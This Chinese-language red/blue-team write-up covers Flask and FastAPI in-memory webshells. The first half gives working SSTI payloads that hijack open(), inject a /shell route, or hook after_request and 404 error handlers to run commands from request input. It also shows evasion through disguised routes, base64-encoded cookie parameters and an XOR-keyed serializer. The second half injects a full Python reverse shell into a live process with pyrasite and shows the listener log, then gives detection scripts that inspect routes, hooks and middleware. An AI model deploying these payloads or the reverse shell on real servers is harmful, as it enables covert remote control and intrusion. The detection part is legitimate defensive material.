Red Team
受限于篇幅,我这里就简单介绍一下flask内存马的几种姿势,以ssti为例子,本质上还是调用exec,eval,compile这些内置底层函数
参考了这篇文章,写的不错:Flask 内存马 - caterpie的小站
函数劫持式(各路后端框架通用)
参考至:https://err0r233.github.io/posts/25143.html 目前全文没有相关思路,我只这里直接劫持底层的open()函数例如在flask中
{{lipsum.__globals__['__builtins__']['exec']("global original_open
original_open=globals()['__builtins__']['open']
def custom_open(*args,**kwargs):
from flask import request
if request.query_params.get("cmd"):return __import__('io').StringIO(__import__('os').popen(request.query_params.get("cmd")).read())
else:return original_open(*args,**kwargs)
globals()['__builtins__']['open']=custom_open")}}
这样再任何有返回open()文件内容的地方,就会输出cmd参数命令执行的结果了而且不会影响文件正常执行
稍加改动就可以在fastapi上动了
config.__init__.__globals__['__builtins__']['exec']("global original_open
original_open=globals()['__builtins__']['open']
def custom_open(*args,**kwargs):
if request.query_params.get('cmd'):return __import__('io').StringIO(__import__('os').popen(request.query_params.get('cmd')).read())
else:return original_open(*args,**kwargs)
globals()['__builtins__']['open']=custom_open",{"request":request})
添加路由式(flask高版本)
经典中的经典,但由于flask添加了保护机制,我们需要通过先操作url_map
:
url_for.__globals__['__builtins__']['eval'](
"app.url_map.add(
app.url_rule_class('/shell', methods=['GET'], endpoint='shell')
)",
{
'app':url_for.__globals__['current_app']
}
)
再去add_rule:
url_for.__globals__['__builtins__']['eval'](
"app.view_functions.update(
{
'shell': lambda:__import__('os').popen(
app.request_context.__globals__['request_ctx'].request.args.get('cmd', 'whoami')
).read()
}
)",
{
'app':url_for.__globals__['current_app']
}
)
after_request式
这个比较安全,在业务逻辑处理完成后再去到木马代码
{{url_for.__globals__['__builtins__']['eval']("app.after_request_funcs.setdefault(None, []).append(lambda resp: CmdResp if request.args.get('cmd') and exec(\"global CmdResp;CmdResp=__import__(\'flask\').make_response(__import__(\'os\').popen(request.args.get(\'cmd\')).read())\")==None else resp)",{'request':url_for.__globals__['request'],'app':get_flashed_messages.__globals__['current_app']})}}
错误触发式
这个隐蔽性高,只有访问错误的界面才会触发,比如404
{{url_for.__globals__['__builtins__']['exec']("global exc_class;global code;exc_class,code=app._get_exc_class_and_code(404);app.error_handler_spec[None][code][exc_class] = lambda error:__import__('os').popen(request.args.get('qwq')).read()", {'request':url_for.__globals__['request'],'app':get_flashed_messages.__globals__['current_app']})}}
如何隐匿flask内存马?
例如我可以改成常见的路由:比如/api/log伪装成日志记录的api
url_for.__globals__['__builtins__']['eval'](
"app.view_functions.update(
{
'api/user/log': lambda:__import__('os').popen(
app.request_context.__globals__['request_ctx'].request.args.get('cmd', 'whoami')
).read()
}
)",
{
'app':url_for.__globals__['current_app']
}
)
而且我们不要让命令和接受命令的参数为明文
{{url_for.__globals__['__builtins__']['exec']("global exc_class;global code;exc_class,code=app._get_exc_class_and_code(404);app.error_handler_spec[None][code][exc_class] = lambda error: __import__('os').popen(__import__('base64').b64decode(request.cookies.get('userinfo')).decode('utf-8')).read()", {'request':url_for.__globals__['request'],'app':get_flashed_messages.__globals__['current_app']})}}
例如我在这里加入了从cookie读取,userinfo作为用户传参。而且结合errhandler,你只要随便访问一个不存在的路由就能触发内存马,这样就可以根据被攻击服务的实时情况,来随时调整,例如/api/AccoutINFO,/getData...
你还可以通过异或加密输入和使用json格式配合flask原生的加解密返回来实现流量层级的隐匿
global exc_class
global code
from itsdangerous import URLSafeSerializer
from flask import request
import json
exc_class, code = app._get_exc_class_and_code(404)
secret_key=''.join(chr(ord(a) ^ ord(b)) for a, b in zip('M8):M2uY[2%<^4+',',M[U?SX4>_VT;XG'))
def execute_command(cmd,secret_key):
serializer = URLSafeSerializer(secret_key)
encrypted_userinfo=cmd
if not encrypted_userinfo:
return
try:
command = serializer.loads(encrypted_userinfo)
except Exception as e:
data = {
'status': 'error',
'message': 'Decryption failed',
'result': ''
}
try:
result=None
eval(command)
except Exception as e:
data = {
'status': 'error',
'message': str(e),
'result': ''
}
data = {
'status': 'ok',
'result': serializer.dumps(result)
}
return json.dumps(data)
app.error_handler_spec[None][code][exc_class] = lambda error: execute_command(request.cookies.get('userinfo'), secret_key)
#{{url_for.__globals__['__builtins__']['exec']("global exc_class\nglobal code\nfrom itsdangerous import URLSafeSerializer\nfrom flask import request\nimport json\nexc_class,code=app._get_exc_class_and_code(404)\nsecret_key=''.join(chr(ord(a)^ord(b))for(a,b)in zip('M8):M2uY[2%<^4+',',M[U?SX4>_VT;XG'))\ndef execute_command(cmd,secret_key):\n\tD='error';C='message';B='result';A='status';serializer=URLSafeSerializer(secret_key);encrypted_userinfo=cmd\n\tif not encrypted_userinfo:return\n\ttry:command=serializer.loads(encrypted_userinfo)\n\texcept Exception as e:data={A:D,C:'Decryption failed',B:''}\n\ttry:result=None;eval(command)\n\texcept Exception as e:data={A:D,C:str(e),B:''}\n\tdata={A:'ok',B:serializer.dumps(result)};return json.dumps(data)\napp.error_handler_spec[None][code][exc_class]=lambda error:execute_command(request.cookies.get('userinfo'),secret_key)", {'request':url_for.__globals__['request'],'app':get_flashed_messages.__globals__['current_app']})}}
不过也有现成的pythonshell管理工具就是了,那个思路也不错
orzchen/PyMemShell: Python内存马管理工具 Python MemShell
Blue Team
从内存取证
想要根除内存马当然是去内存找啦,什么流量分析都是隔靴搔痒
目前这部分内容是全网独一家的研究,我自己是比较偏向于使用pyrasite这个库配合自己的脚本实现的
#!/usr/bin/env python3
import socket
import sys
import os
import code
def reverse_python_shell(target_ip, target_port):
try:
# 创建套接字并连接到监听端
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_ip, target_port))
# 将标准输入、输出、错误重定向到套接字
sock_file = sock.makefile("rw")
sys.stdin = sock_file
sys.stdout = sock_file
sys.stderr = sock_file
# 打印欢迎信息
print(f"Connected to {target_ip}:{target_port}")
print("Python interactive shell is ready. Type Python code to execute.")
# 启动 Python 交互式解释器
shell =code.InteractiveConsole(globals())
shell.interact()
except Exception as e:
# 如果发生错误,发送错误信息并关闭连接
try:
sock.sendall(f"Error: {str(e)}\n".encode())
except:
pass
finally:
sock.close()
if __name__ == "__main__":
# 配置目标 IP 和端口
target_ip = "192.168.239.199" # 替换为监听端的 IP
target_port = 4444 # 替换为监听端的端口
reverse_python_shell(target_ip, target_port)
将上述代码保存为shell-rev-py.py并且开好nc接受,然后再安装了pyrasite库的情况下直接注入
python进程:
pyrasite (pgrep -f "python3") shell-rev-py.py --verbose
便可大功告成
PS C:\Users\20232\Desktop> ncat -lvvp 4444
Ncat: Version 7.95 ( https://nmap.org/ncat )
Ncat: Listening on [::]:4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.239.199:26475.
Connected to 192.168.239.199:4444
Python interactive shell is ready. Type Python code to execute.
Python 3.12.7 (main, Nov 8 2024, 17:55:36) [GCC 14.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
(InteractiveConsole)
>>>
首先拿我们的errorhandler开杀
我们只要对上述代码稍加改动:
global exc_class;global code;exc_class,code=app._get_exc_class_and_code(404);
memshell=app.error_handler_spec[None][code][exc_class]
并且结合反汇编:
import dis
dis.dis(memshell)
>>> memshell=app.error_handler_spec[None][code][exc_class]
>>> dis.dis(memshell)
16 0 RESUME 0
2 LOAD_GLOBAL 1 (NULL + execute_command)
12 LOAD_GLOBAL 2 (request)
22 LOAD_ATTR 4 (cookies)
42 LOAD_ATTR 7 (NULL|self + get)
62 LOAD_CONST 1 ('userinfo')
64 CALL 1
72 LOAD_GLOBAL 8 (secret_key)
82 CALL 2
90 RETURN_VALUE
便可让其露出马脚
同样的,针对before&after_request内存马,我们则可以使用:
>>> app.after_request_funcs
defaultdict(<class 'list'>, {None: [<function <lambda> at 0x7f4978b647c0>]})
>>> app.after_request_funcs
defaultdict(<class 'list'>, {None: [<function <lambda> at 0x7f4978b647c0>]})
而经典的路径内存马,我们则可以通过:
app.url_map.iter_rules()来查杀,配合反汇编
print("Registered routes:") for rule in app.url_map.iter_rules(): print(f"Endpoint: {rule.endpoint}, Methods: {rule.methods}, Rule: {rule.rule}")
还有一个思路就是去检查内存代码中对应的本地文件,配合原生的inspect模块
import inspect
# 假设发现了一个可疑的函数 suspicious_function
suspicious_function = app.view_functions["test"]
# 打印函数的来源
print("Function name:", suspicious_function.__name__)
print("Source file:", inspect.getfile(suspicious_function))
print("Source code:")
print(inspect.getsource(suspicious_function))
如果发现不存在就是内存马了
你也可以查看动态注入的路由
print("Registered endpoints and functions:")
for endpoint, func in app.view_functions.items():
print(f"Endpoint: {endpoint}, Function: {func}, File: {inspect.getfile(func)}")
我总结了个排查脚本:
#!/usr/bin/env python3
import sys
import os
import base64
import dis
import inspect
from collections import defaultdict
OUTPUT_FILE = "/tmp/flask_memshell_analysis.txt" # 输出文件路径
def save_to_file(data):
"""将数据保存到文件"""
with open(OUTPUT_FILE, "a") as f:
f.write(data + "\n")
def analyze_function(func, description):
"""分析函数,提取字节码和反汇编信息"""
try:
# 获取字节码
bytecode = func.__code__.co_code
bytecode_b64 = base64.b64encode(bytecode).decode()
# 获取反汇编信息
disassembled = dis.Bytecode(func)
disassembled_str = "\n".join([f"{instr.opname} {instr.argrepr}" for instr in disassembled])
# 保存结果
save_to_file(f"=== {description} ===")
save_to_file(f"Function: {func.__name__}")
save_to_file(f"File: {inspect.getfile(func)}")
save_to_file(f"Base64 Bytecode: {bytecode_b64}")
save_to_file(f"Disassembled Bytecode:\n{disassembled_str}")
save_to_file("\n")
except Exception as e:
save_to_file(f"Error analyzing function {func}: {str(e)}\n")
def check_dynamic_routes(app):
"""检查动态注册的路由"""
save_to_file("=== Dynamic Routes ===")
try:
for rule in app.url_map.iter_rules():
func = app.view_functions[rule.endpoint]
save_to_file(f"Endpoint: {rule.endpoint}, Methods: {rule.methods}, Rule: {rule.rule}")
analyze_function(func, f"Route Function ({rule.endpoint})")
except Exception as e:
save_to_file(f"Error checking routes: {str(e)}\n")
def check_before_request(app):
"""检查 before_request 中的函数"""
save_to_file("=== Before Request ===")
try:
for func in app.before_request_funcs.get(None, []):
analyze_function(func, "Before Request Function")
except Exception as e:
save_to_file(f"Error checking before_request: {str(e)}\n")
def check_after_request(app):
"""检查 after_request 中的函数"""
save_to_file("=== After Request ===")
try:
for func in app.after_request_funcs.get(None, []):
analyze_function(func, "After Request Function")
except Exception as e:
save_to_file(f"Error checking after_request: {str(e)}\n")
def check_error_handlers(app):
"""检查 errorhandler 中的函数"""
save_to_file("=== Error Handlers ===")
try:
for code, handler_map in app.error_handler_spec[None].items():
for exc_class, func in handler_map.items():
analyze_function(func, f"Error Handler ({exc_class}, {code})")
except Exception as e:
save_to_file(f"Error checking error handlers: {str(e)}\n")
def main():
"""主函数"""
save_to_file("=== Flask Memory Shell Analysis ===")
save_to_file(f"Injected into process PID: {os.getpid()}\n")
if 'app' not in globals():
save_to_file("Error: No 'app' variable found in globals.\n")
return
app = globals()['app']
save_to_file(f"Flask app detected: {repr(app)}\n")
# 检查动态路由
check_dynamic_routes(app)
# 检查 before_request
check_before_request(app)
# 检查 after_request
check_after_request(app)
# 检查 errorhandler
check_error_handlers(app)
save_to_file("=== Analysis Complete ===\n")
if __name__ == "__main__":
main()
同样的也可以查杀fastapi
import sys
import inspect
from fastapi.routing import APIRoute
from starlette.middleware.base import BaseHTTPMiddleware
def detect_middleware_injection(app):
"""
检查 FastAPI 应用中的中间件,检测是否有恶意注入的中间件。
"""
print("=== Checking Middlewares ===")
for index, middleware in enumerate(app.user_middleware):
try:
dispatch_func = middleware.options.get("dispatch", None)
if dispatch_func:
print(f"Middleware {index}: {middleware.cls.__name__}")
print(f"Dispatch function: {dispatch_func}")
# 检查是否是动态定义的函数
if inspect.isfunction(dispatch_func):
source_file = inspect.getfile(dispatch_func)
if source_file == "<string>":
print(f" [ALERT] Middleware {index} has dynamically defined dispatch function!")
print(f" Function source: {inspect.getsource(dispatch_func)}")
else:
print(f" Source file: {source_file}")
except Exception as e:
print(f"Error analyzing middleware {index}: {e}")
def detect_route_injection(app):
"""
检查 FastAPI 应用中的路由,检测是否有动态注入的路由。
"""
print("=== Checking Routes ===")
for route in app.routes:
if isinstance(route, APIRoute):
endpoint = route.endpoint
try:
# 检查路由的 endpoint 函数
source_file = inspect.getfile(endpoint)
if source_file == "<string>":
print(f" [ALERT] Route {route.path} has dynamically defined endpoint!")
print(f" Endpoint source: {inspect.getsource(endpoint)}")
else:
print(f" Route {route.path} -> Endpoint: {endpoint.__name__}")
print(f" Source file: {source_file}")
except Exception as e:
print(f"Error analyzing route {route.path}: {e}")
def main():
"""
主函数,执行所有检测逻辑。
"""
if "app" not in sys.modules["__main__"].__dict__:
print("Error: No FastAPI app instance found in the main module.")
return
app = sys.modules["__main__"].__dict__["app"]
print(f"Detected FastAPI app: {app}")
# 检查中间件
detect_middleware_injection(app)
# 检查路由
detect_route_injection(app)
if __name__ == "__main__":
main()